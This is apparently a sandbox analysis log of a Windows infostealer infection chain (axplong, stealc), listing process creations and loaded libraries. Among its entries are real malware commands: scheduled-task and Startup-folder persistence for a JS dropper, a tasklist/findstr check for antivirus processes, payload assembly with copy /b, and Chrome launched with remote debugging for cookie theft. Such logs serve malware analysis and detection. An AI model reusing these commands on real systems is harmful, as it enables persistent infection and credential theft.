Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe"
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe"
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: unknown unknown

Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostservice.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: networkhelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userdataplatformhelperutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mccspal.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: syncutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcfgutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dmcmnutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dmxmlhelputils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: inproclogger.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.networking.connectivity.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: synccontroller.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pimstore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: aphostclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: accountaccessor.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: systemeventsbrokerclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatalanguageutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mccsengineshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cemapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatatypehelperutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: phoneutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: storsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bcd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: storageusage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: w32time.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vmictimeprovider.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll	Jump to behavior
